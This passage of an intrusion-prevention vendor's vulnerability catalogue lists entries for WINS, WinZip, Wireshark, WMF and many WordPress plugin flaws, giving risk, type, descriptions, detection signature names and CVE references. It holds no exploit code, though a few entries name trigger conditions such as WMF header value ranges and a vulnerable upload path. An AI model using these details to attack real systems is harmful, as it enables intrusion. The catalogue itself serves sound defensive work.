https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1923

MS09-039
http://technet.microsoft.com/security/bulletin/MS09-039

WINS-Computer-Name-Validation-Buffer-Overflow

About this vulnerability:

Windows Internet Naming Service (WINS) buffer overflow vulnerability via long Name value

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Certain versions of the Windows Internet Naming Service (WINS) server do not properly validate the name field when processing requests. This allows remote attackers to cause a buffer overflow via crafted WINS packets, potentially leading to arbitrary code execution on the vulnerable machine.

Situation:

WINS_WINS-Computer-Name-Validation-Buffer-Overflow

References:

CVE-2004-0567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0567

BID-11922
http://www.securityfocus.com/bid/11922

OSVDB-12370
http://www.osvdb.org/12370

MS04-045
http://technet.microsoft.com/security/bulletin/MS04-045

WINS-Replication-Packet-System-Comromise

About this vulnerability:

WINS replication packet allows system compromise

Risk:

High

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows NT; Windows 2003

Software:

<os>

Type:

Malfunction

Description:

Several versions of Microsoft Windows have a vulnerability in the handling of WINS packets. An unauthenticated remote attacker can send a special-crafted WINS replication packet, which leads to arbitrary code execution on the server.

Situation:

WINS_Replication-Packet-System-Compromise
WINS_Replication-Packet-BOF-System-Compromise

References:

CVE-2004-1080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1080

BID-11763
http://www.securityfocus.com/bid/11763

OSVDB-12378
http://www.osvdb.org/12378

MS04-045
http://technet.microsoft.com/security/bulletin/MS04-045

Wintr-Web-Project-SQL-Injection

About this vulnerability:	A vulnerability in Wintr Web Project
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wintr Web Project
Type:	Malfunction
Description:	There is an SQL injection vulnerability in Wintr Web Project which may allow an unauthorized information disclosure and execution of arbitrary commands.
Situation:	HTTP_CRL-Wintr-Web-Project-SQL-Injection

WinVNC-Web-Server-Buffer-Overflow

About this vulnerability:

A WinVNC Web Server Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Windows

Software:

WinVNC

Type:

Buffer Overflow

Description:

A vulnerability in WinVNC Web Server, versions 3.3.3r7 and before, which allows remote attackers to execute arbitrary commands via a long HTTP GET request.

References:

CVE-2001-0168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0168

BID-2306
http://www.securityfocus.com/bid/2306

OSVDB-6280
http://www.osvdb.org/6280

Winwebsec-Botnet

About this vulnerability:	Winwebsec botnet
Risk:	High
First detected in:	sgpkg-ips-556-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Winwebsec is a malicious botnet. Infected computers exhibit the presence of a fake antivirus software with varying product names. The monetization scheme of fake antivirus software is to spoof a user interface that resembles the interface of a legitimate antivirus product and to present arbitrary infection indicators. However, in order to presumably disinfect, the user is asked to buy a "license". While the a computer is indeed infected, the intention of the fake antivirus is typically not to disinfect the computer, even after having purchased a license. It is recommended not to buy any kind of license of the fake antivirus program. Instead, users are advised to disinfect computers with antivirus solutions of trusted origin.
Situation:	HTTP_CS-Spyeye-Botnet-Request HTTP_CRL-Winwebsec-Botnet-Request

WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in WinZip

Risk:

High

First detected in:

sgpkg-ips-161-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WinZip

Type:

Buffer Overflow

Description:

WinZip has a stack-based buffer overflow vulnerability. A target user with a vulnerable version of the affected product can be persuaded to visit a malicious web page containing an excessively long value assigned to the CreateFolderFromName property of the FileView object. This may lead to code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
File-Text_WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow

References:

CVE-2006-6884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6884

WinZip-UUDeview-Mime-Archive-Buffer-Overrun

About this vulnerability:

A vulnerability in WinZip

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WinZip

Type:

Buffer Overflow

Description:

A buffer overrun exists in WinZip.exe MIME parsing routines provided by the UUDeview component. This vulnerability can be triggered to cause WinZip to prematurely terminate or possibly execute arbitrary code by sending a specially crafted MIME message.

Situation:

File-Text_WinZip-UUDeview-Mime-Archive-Buffer-Overrun

References:

BID-9758
http://www.securityfocus.com/bid/9758

Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Wireshark.

Risk:

High

First detected in:

sgpkg-ips-1455-5242

Last changed:

sgpkg-ips-1455-5242

Platform:

Windows; Unix; Linux

Software:

Wireshark

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability in Wireshark, versions 3.2.x prior to 3.2.18 and 3.4.x prior to 3.4.10, which allows remote attackers to execute arbitrary code by enticing a user to open a packet trace file or sending an SDP PDU through a sniffed connection with a crafted continuation state length, due to the insufficient input validation while parsing Bluetooth SDP protocol traffic.

Situation:

Generic_UDP-Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow

References:

CVE-2021-39925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39925

Wireshark-Capwap-Dissector-Denial-Of-Service

About this vulnerability:

A Wireshark Capwap Dissector Denial Of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wireshark

Type:

Configuration Error

Description:

A vulnerability in Wireshark, versions 1.6.x before 1.6.16 and 1.8.x before 1.8.8, which allows remote attackers to cause a denial of service condition via a crafted packet, due to the incorrect use of a -1 to represent an error condition.

Situation:

Generic_UDP-Wireshark-Capwap-Dissector-Denial-Of-Service

References:

CVE-2013-4074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4074

BID-60500
http://www.securityfocus.com/bid/60500

OSVDB-94091
http://www.osvdb.org/94091

Wireshark-CLDAP-Dissector-DOS

About this vulnerability:

A Wireshark CLDAP Dissector DOS vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wireshark

Type:

Input Validation

Description:

A vulnerability in Wireshark, versions 1.0.x, 1.2.0 through 1.2.14, and 1.4.0 through 1.4.3, which allows remote attackers to cause a denial of service condition via a crafted SMB or connectionless LDAP packet.

Situation:

LDAP-UDP_CS-Wireshark-CLDAP-Dissector-DOS

References:

CVE-2011-1140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1140

OSVDB-71552
http://www.osvdb.org/71552

Wireshark-Insecure-Search-Path-Script-Execution

About this vulnerability:

A vulnerability in Wireshark Foundation Wireshark

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wireshark

Type:

Malfunction

Description:

There is an insecure search path vulnerability in Wireshark. The vulnerability can be exploited when opening a pcap or capture file, the application searches for a script 'console.lua' from the same directory that the pcap was found. A remote attacker could exploit this vulnerability by enticing a user to open a pcap file from a remote WebDAV or SMB share. Successful exploitation could allow an attacker to execute an arbitrary lua script in the context of the user running Wireshark.

Situation:

HTTP_CSU-Wireshark-Insecure-Search-Path-Script-Execution
SMB-TCP_CHS_Wireshark-Insecure-Search-Path-Script-Execution

References:

CVE-2011-3360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3360

OSVDB-75347
http://www.osvdb.org/75347

Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow

About this vulnerability:

Wireshark LWRES Dissector Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows;Mac OS X;Linux

Software:

Wireshark

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5, via the LWRES Dissector dissect_getaddrsbyname_request function, which allows remote attackers to execute arbitrary code or cause a denial of service condition.

Situation:

Generic_UDP-Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow

References:

CVE-2010-0304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0304

BID-37985
http://www.securityfocus.com/bid/37985

OSVDB-61987
http://www.osvdb.org/61987

Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Wireshark

Risk:

High

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1716-5242

Platform:

Generic

Software:

Wireshark

Type:

Malfunction

Description:

A heap-based buffer overflow vulnerability has been reported in Wireshark. This vulnerability is due to improper input validation when handling NetScreen packet capture files. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the current process.

Situation:

File-Text_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
File-Binary_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow

References:

CVE-2023-6175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6175

Wireshark-SigComp-Buffer-Overflow-Vulnerability

About this vulnerability:

Wireshark SigComp Buffer Overflow Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-694-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wireshark

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Wireshark, versions 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8, in the SigComp Universal Decompressor Virtual Machine dissector.

Situation:

SIP-UDP_Wireshark-SigComp-Buffer-Overflow-Vulnerability

References:

CVE-2010-2287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2287

BID-40728
http://www.securityfocus.com/bid/40728

WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow

About this vulnerability:

WMF header parsing vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-61-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows ME

Software:

<os>

Type:

Buffer Overflow

Description:

Certain versions of Microsoft Windows contain a component that does not parse placeable WMF images correctly. A placeable WMF image with the FileSize value in the header set in the range 0x00000000-0x00000008 or 0x80000000-0x80000008 triggers an integer underflow, which later leads to a buffer overflow. Arbitrary remote code execution is possible via a successfull exploit. Internet Explorer uses the vulnerable component to parse WMF images, which allows malicious web pages to easily exploit visitors using the browser.

Situation:

HTTP_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
File-Binary_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow

References:

CVE-2006-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0020

BID-16516
http://www.securityfocus.com/bid/16516

OSVDB-22976
http://www.osvdb.org/22976

MS06-004
http://technet.microsoft.com/security/bulletin/MS06-004

WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this vulnerability:

Windows Graphics Render Engine arbitrary code execution vulnerability

Risk:

Critical

First detected in:

sgpkg-ips-50-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Microsoft Windows Graphics Render Engine has an buffer overflow vulnerability in the code rendering WMF (Windows Metafile Format) images. The vulnerability allows arbitrary code execution when a malicious WMF file is opened with the vulnerable Windows component.

Situation:

HTTP_WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
HTTP_WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
E-Mail_BS-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
E-Mail_BS-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
FTP_DL-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
FTP_DL-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution-2
File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution

References:

CVE-2005-4560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4560

BID-16074
http://www.securityfocus.com/bid/16074

MS06-001
http://technet.microsoft.com/security/bulletin/MS06-001

WMF-Windows-Metafile-Vulnerability-MS05-053

About this vulnerability:

Windows parses WMF files incorrectly, allowing denial of service attacks

Risk:

High

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

WMF, Microsoft Windows Metafile Format, is an image format used to store both bitmap and vector formatted graphics data. Large, crafted values in a WMF file's header can cause a denial of service situation on certain versions of Windows.

Situation:

HTTP_Windows-Metafile-Vulnerability-MS05-053
File-Binary_Microsoft-Windows-Metafile-Vulnerability-MS05-053

References:

CVE-2005-2124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2124

BID-15352
http://www.securityfocus.com/bid/15352

MS05-053
http://technet.microsoft.com/security/bulletin/MS05-053

Wnad

About this vulnerability:	WNAD
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WNAD
Type:	Misconfiguration
Description:	WNAD is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Wnad

Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow

About this vulnerability:

A vulnerability in wolfSSL

Risk:

Moderate

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

wolfSSL

Type:

Input Validation

Description:

There has been reported a buffer overflow vulnerability in wolfSSL embedded SSL/TLS library. This vulnerability could be exploited remotely. Successful exploitation might lead in arbitrary code execution.

Situation:

TLS_CS-Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow

References:

CVE-2019-11873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11873

Word-RTF-Listoverridecount-RCE-CVE-2012-2539

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-497-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

An attempt to exploit vulnerability in Microsoft Word was detected

Situation:

File-Text_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-RTF_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities

References:

CVE-2012-2539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2539

MS12-077
http://technet.microsoft.com/security/bulletin/MS12-077

Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress 10Web Photo Gallery Plugin

Risk:

High

First detected in:

sgpkg-ips-1233-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress 10Web Photo Gallery Plugin

Type:

Cross-site Scripting

Description:

There exists a vulnerability in the WordPress 10Web Photo Gallery Plugin, versions before 1.5.46, which allows remote attackers to execute arbitrary code by crafting malicious image titles and descriptions, due to insufficient sanitization of user input during image metadata editing.

Situation:

HTTP_CRL-Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting

References:

CVE-2020-9335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9335

Wordpress-10Web-Photo-Gallery-SQL-Injection

About this vulnerability:	A vulnerability in WordPress Project 10Web Photo Gallery
Risk:	High
First detected in:	sgpkg-ips-1260-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress 10Web Photo Gallery Plugin
Type:	Input Validation
Description:	An SQL injection vulnerability has been reported in 10Web Photo Gallery Plugin for WordPress. The vulnerability is due to insufficient sanitization of user input. A remote, unauthenticated attacker could exploit this vulnerability by crafting a malicious request to the target server. Successful exploitation could result in execution of arbitrary SQL commands against the database on the target server.
Situation:	HTTP_CSU-Wordpress-10Web-Photo-Gallery-SQL-Injection

Wordpress-Admin-API-Directory-Traversal

About this vulnerability:

A vulnerability in WordPress Project WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-797-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Incorrect parameter validation causes a directory traversal vulnerability in Wordpress. A successful exploit allows an attacker to cause a denial of service condition.

Situation:

HTTP_CRL-Wordpress-Admin-API-Directory-Traversal

References:

CVE-2016-6896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6896

Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-XSS

About this vulnerability:

A vulnerability in WordPress Project Advanced Custom Fields Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1596-5242

Last changed:

sgpkg-ips-1596-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Lack of validation on the post_status parameter in the Custom Fields Plugin for WordPress causes a cross-site scripting vulnerability. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-Cross-Site-Scripting

References:

CVE-2023-30777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30777

Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE

About this vulnerability:	An attempt to exploit a vulnerability in Wordpress AIT CSV Import/Export plugin
Risk:	High
First detected in:	sgpkg-ips-1340-5242
Last changed:	sgpkg-ips-1340-5242
Platform:	Generic
Software:	Wordpress AIT CSV Import Export plugin
Type:	Malfunction
Description:	There exists a vulberability in Wordpress AIT CSV Import/Export plugin, versions 3.0.3 and before, which allows remote attackers to execute arbitrary PHP code by uploading a PHP file to ait-csv-import-export/admin/upload-handler.php which has no content type validation.
Situation:	HTTP_CS-Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE

Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal

About this vulnerability:

A vulnerability in WordPress Project All-in-One WP Migration

Risk:

Moderate

First detected in:

sgpkg-ips-1471-5242

Last changed:

sgpkg-ips-1471-5242

Platform:

Generic

Software:

WordPress

Type:

Directory Traversal

Description:

Insufficient sanitization of user-supplied data in class-ai1wm-backups.php causes a vulnerability in the All-in-One WP Migration plugin of WordPress. A successful exploit may allow an attacker to delete arbitray files on the target system and cause a denial of service condition.

Situation:

HTTP_CRL-Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal

References:

CVE-2022-1476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1476

Wordpress-Arbitrary-File-Deletion

About this vulnerability:	A vulnerability in Wordpress
Risk:	High
First detected in:	sgpkg-ips-1156-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress
Type:	Directory Traversal
Description:	A vulnerability in WordPress which allows remote attackers to execute arbitrary code and take over the WordPress site due to lack of proper permissions over critical files.
Situation:	HTTP_CRL-Wordpress-Arbitrary-File-Deletion

Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956

About this vulnerability:

A vulnerability in WordPress Automatic plugin

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in WordPress Automatic plugin versions through 3.92.0. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary SQL queries.

Situation:

HTTP_CRL-Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956

References:

CVE-2024-27956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956

Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS

About this vulnerability:

A vulnerability in WordPress Project AYS Popup Box

Risk:

Moderate

First detected in:

sgpkg-ips-1648-5242

Last changed:

sgpkg-ips-1648-5242

Platform:

Generic

Software:

WordPress Project AYS Popup Box

Type:

Input Validation

Description:

Improper input validation of the upgrade_plugin parameter in class-ays-pb-admin.php causes a cross-site scripting vulnerability in WordPress AYS Popup Box. A succesful exploit allows an attacker to execute arbitrary scriptes in a user's browser.

Situation:

HTTP_CRL-Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS

References:

CVE-2023-4137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4137

Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in the WordPress plugin Backup Migration detected.

Risk:

High

First detected in:

sgpkg-ips-1692-5242

Last changed:

sgpkg-ips-1692-5242

Platform:

Generic

Software:

WordPress Backup Migration Plugin

Type:

Input Validation

Description:

A vulnerability in the WordPress plugin Backup Migration, versions prior to 1.4.0, which allows remote attackers to execute arbitrary OS commands by sending crafted requests to the target server, due to the improper input validation in ajax.php.

Situation:

HTTP_CS-Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection

References:

CVE-2023-7002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7002

Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution

About this vulnerability:

A vulnerability in WordPress Backup Migration Plugin

Risk:

High

First detected in:

sgpkg-ips-1675-5242

Last changed:

sgpkg-ips-1675-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in the WordPress plugin Backup Migration. This vulnerability is due to improper input validation in backup-heart.php. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in the execution of arbitrary PHP code.

Situation:

HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution
HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Possible-File-Inclusion

References:

CVE-2023-6553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6553

Wordpress-Backuply-Plugin-Options-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Backuply Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1786-5242

Last changed:

sgpkg-ips-1786-5242

Platform:

Generic

Software:

WordPress Project Backuply Plugin

Type:

Input Validation

Description:

Improper input validation of the "options[...]" parameters in the backuply_wp_clone_sql function causes an SQL injection vulnerability in the Backuply plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Backuply-Plugin-Options-SQL-Injection

References:

CVE-2024-8669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8669

Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS

About this vulnerability:

A vulnerability in WordPress Project Beautiful Cookie Consent Banner Plugin

Risk:

High

First detected in:

sgpkg-ips-1610-5242

Last changed:

sgpkg-ips-1610-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the WordPress plugin Beautiful Cookie Consent Banner. This vulnerability is due to improper input validation for the nsc_bar_content_href parameter. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS

References:

CVE-2023-3388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3388

Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization

About this vulnerability:

A vulnerability in WordPress Better Search Replace plugin

Risk:

High

First detected in:

sgpkg-ips-1701-5242

Last changed:

sgpkg-ips-1701-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported for the WordPress Better Search Replace Plugin. This vulnerability is due to improper input validation in the class-bsr-db.php file. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution.

Situation:

HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization
HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Potential-Insecure-Deserialization

References:

CVE-2023-6933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6933

Wordpress-BookingPress-SQLi

About this vulnerability:

A vulnerability in the Wordpress BookingPress Plugin.

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Generic

Software:

WordPress BookingPress Plugin

Type:

Input Validation

Description:

A vulnerability in the the Wordpress BookingPress Plugin, versions before 1.0.11, which allows remote attackers to execute arbitrary SQL queries via the "total_service" parameter.

Situation:

HTTP_CRL-Wordpress-BookingPress-SQLi

References:

CVE-2022-0739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739

Wordpress-BulletProof-Security-Backup-Disclosure

About this vulnerability:

A vulnerability in the Wordpress BulletProof Security plugin.

Risk:

High

First detected in:

sgpkg-ips-1430-5242

Last changed:

sgpkg-ips-1430-5242

Platform:

Generic

Software:

Wordpress BulletProof Security

Type:

Malfunction

Description:

A vulnerability in the Wordpress BulletProof Security plugin, versions 5.1 and before, which allows remote attackers access to all user credentials by allowing public access to db_backup_log.txt and it's directory.

Situation:

HTTP_CSU-Wordpress-BulletProof-Security-Backup-Disclosure

References:

CVE-2021-39327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39327

Wordpress-C-Library-Gethostbyname-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU C Library

Risk:

High

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

glibc

Type:

Buffer Overflow

Description:

Situation:

HTTP_CRL-Wordpress-C-Library-Gethostbyname-Buffer-Overflow

References:

CVE-2015-0235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235

BID-72325
http://www.securityfocus.com/bid/72325

OSVDB-117579
http://www.osvdb.org/117579

Wordpress-Calculated-Fields-Form-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Calculated Fields Form plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient input validation in the Calculated Fields Form plugin of WordPress causes a cross-site scripting vulnerability that allows an attacker to execute arbitrary script in the user's browser.

Situation:

HTTP_CRL-Wordpress-Calculated-Fields-Form-Cross-Site-Scripting

References:

CVE-2020-7228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7228

Wordpress-Comment-Content-Filter-Remote-Code-Execution

About this vulnerability:

A vulnerability in WordPress Project WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

WordPress lacks proper protection for cross-site request forgery when processsing comment content in the wp_rel_nofollow_callback function. The vulnerability can be exploited to execute arbitrary PHP code on the target.

Situation:

File-Text_Wordpress-Comment-Content-Filter-Remote-Code-Execution

References:

CVE-2019-9787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787

Wordpress-Comments-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Wordpress. The vulnerability is due to insufficient validation of comments. By convincing a user to visit a malicious website, a remote attacker can exploit the XSS vulnerability to execute arbitrary script in the user's browser session or gain access to sensitive information. If an administrator is enticed, then arbitrary command execution on the server is possible.

Situation:

HTTP_CRL-Wordpress-Comments-Stored-Cross-Site-Scripting

References:

CVE-2015-3440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3440

OSVDB-121320
http://www.osvdb.org/121320

Wordpress-Compfight-1.4-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-600-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in WordPress compfight.php. The vulnerability is due to lack of sanitization of data supplied in the search-value parameter. Remote authenticated attackers can exploit this vulnerability to execute arbitrary HTML and script code in the users' browser sessions in the context of the vulnerable web site.

Situation:

HTTP_CRL-Wordpress-Compfight-1.4-Cross-Site-Scripting

References:

CVE-2014-5202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5202

Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Contact Form Entries Plugin

Risk:

High

First detected in:

sgpkg-ips-1439-5242

Last changed:

sgpkg-ips-1439-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in the Wordpress Contact Form Entries plugin. The vulnerability is due to insufficient sanitization of HTTP headers. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in the execution of arbitrary script code in the target user's browser.

Situation:

HTTP_CSH-Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-25080
